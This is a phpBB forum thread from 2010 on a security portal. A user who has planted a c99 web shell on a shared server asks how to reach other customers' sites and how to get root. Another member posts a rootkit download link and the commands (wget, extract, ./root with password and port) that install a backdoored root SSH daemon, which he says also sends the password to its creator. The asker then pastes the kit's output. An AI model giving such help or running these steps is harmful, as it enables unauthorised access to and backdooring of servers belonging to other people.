 |
Menu |
 |
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
 |
User Info |
 |
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 190
Members: 0
Total: 190
|
|
|
|
|
 |
Full disclosure |
 |
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Use c99 shell on another domain in the same box |
 |
Posted: Thu Apr 15, 2010 9:38 pm |
|
|
clubreseau |
Advanced user |

 |
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
 |
 |
 |
|
I uploaded a shell on a domain name and i want to see another domain on the same box, i try and i cant it say [ Read-Only ] i cant read or see any files if I exit the directory of the domain where I upload the shell
safe-mode is off
someone can help me and give me some trick
thank you |
|
|
|
|
Posted: Thu Apr 15, 2010 9:48 pm |
|
|
vince213333 |
Advanced user |

 |
|
Joined: Aug 03, 2009 |
Posts: 737 |
Location: Belgium |
|
|
 |
 |
 |
|
That's simply because you're logged in as a user which doesn't have the rights to see the content of the other users.
The only workaround is to either get a shell up in a directory where you can log in as the user u need or simply root the box ^^ |
|
|
|
|
Posted: Fri Apr 16, 2010 12:06 am |
|
|
clubreseau |
Advanced user |

 |
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
 |
 |
 |
|
how i can get the root ? rookit ?
kernel version the box use is 2.6.18-164.11.1.el5 |
|
|
|
|
Posted: Fri Apr 16, 2010 2:16 am |
|
|
clubreseau |
Advanced user |

 |
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
 |
 |
 |
|
someone can give me a rootkit for kernel 2.6.18
and explain how it work
thank you |
|
|
|
|
Posted: Fri Apr 16, 2010 10:00 am |
|
|
vince213333 |
Advanced user |

 |
|
Joined: Aug 03, 2009 |
Posts: 737 |
Location: Belgium |
|
|
 |
 |
 |
|
A rootkit for 2.6 I found:
http://www.sendspace.com/file/7dxgz3
Usage:
upload the tar file to somewhere you can download it from directly
wget http://direct_link_to_mafix.tar.gz
tar xvzf mafix.tar.gz
cd mafix/
./root password port
to make backdoored sshd on <port> with login root/<password>
I just want to say this one is backdoored. It sends the password to somewhere, likely the creator of the kit. |
|
|
|
|
 |
 |
|
 |
Posted: Fri Apr 16, 2010 1:29 pm |
|
|
clubreseau |
Advanced user |

 |
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
 |
 |
 |
|
I write ./root 123456 4343
I receive
[1;30m ___ ___ ___ [1;37m [1;30m ___ [0m
[1;30m /__/\ / /\ / /\ [1;37m ___ [1;30m /__/| [0m
[1;30m | |::\ / /::\ / /:/_ [1;37m / /\ [1;30m | | [0m
[1;30m | | :\ / /:/\:\ / /:/ /\ [1;37m / /:/ [1;30m | | [0m
[1;30m __|__| \:\ / /:/~/::\ / /:/ /:/ [1;37m/__/::\ [1;30m __|__| [0m
[1;30m /__/::: \:\ /__/:/ /:/\:\ /__/:/ /:/ [1;37m\__\/\:\__ [1;30m /__/::::\____[0m
[1;30m \ \:\~~\__\/ \ \:\/:/__\/ \ \:\/:/ [1;37m \ \:\/\ [1;30m ~\~~\::::/[0m
[1;30m \ \:\ \ \::/ \ \::/ [1;37m \__\::/[1;30m |~~| ~~ [0m
[1;30m \ \:\ \ \:\ \ \:\ [1;37m /__/:/ [1;30m | | [0m
[1;30m \ \:\ \ \:\ \ \:\ [1;37m \__\/ [1;30m | | [0m
[1;30m \__\/ \__\/ \__\/ [1;37m [1;30m |__|/ [0m
[1;37m[0m
[1;37m - the ferrari of rootkits - [0m
[1;30mmafix |
 |
|
 |
Posted: Sat Apr 17, 2010 1:13 am |
|
|
vince213333 |
Advanced user |

 |
|
Joined: Aug 03, 2009 |
Posts: 737 |
Location: Belgium |
|
|
 |
 |
 |
|
Can't tell, didn't try it myself. The server might be patched or properly secured.
In any case, that output isn't normal. |
|
|
|
|
Posted: Sat Apr 17, 2010 10:27 am |
|
|
clubreseau |
Advanced user |

 |
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
 |
 |
 |
|
pour ssh en root ses bien a partir de mon ordinateur mon client ssh windows ?
ou sshd avec c99.php a partir du shell |
|
|
|
|
Posted: Sat Apr 17, 2010 1:08 pm |
|
|
vince213333 |
Advanced user |

 |
|
Joined: Aug 03, 2009 |
Posts: 737 |
Location: Belgium |
|
|
 |
 |
 |
|
Je l'essaierais avec le shell avant de l'essayer a partir de vous même. |
|
|
|
|
Posted: Sat Apr 17, 2010 3:48 pm |
|
|
clubreseau |
Advanced user |

 |
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
 |
 |
 |
|
pour ssh en root ses bien a partir de mon ordinateur mon client ssh windows ?
ou sshd avec c99.php a partir du shell |
|
|
|
|
Posted: Sat Apr 17, 2010 3:54 pm |
|
|
vince213333 |
Advanced user |

 |
|
Joined: Aug 03, 2009 |
Posts: 737 |
Location: Belgium |
|
|
 |
 |
 |
|
normallement, ça marche avec ton client de windows.
le problème c'est que je ne sais pas si vous avez gagné root avec ce rootkit, parce que je ne pense pas que "[1;30mmafix |
|
|
|
|
Posted: Tue May 28, 2013 3:25 pm |
|
|
new |
Beginner |

 |
|
Joined: May 28, 2013 |
Posts: 1 |
|
|
|
 |
 |
 |
|
vince213333 wrote: | A rootkit for 2.6 I found:
http://www.sendspace.com/file/7dxgz3
Usage:
upload the tar file to somewhere you can download it from directly
wget http://direct_link_to_mafix.tar.gz
tar xvzf mafix.tar.gz
cd mafix/
./root password port
to make backdoored sshd on <port> with login root/<password>
I just want to say this one is backdoored. It sends the password to somewhere, likely the creator of the kit. |
error link plase update |
|
|
|
|
www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|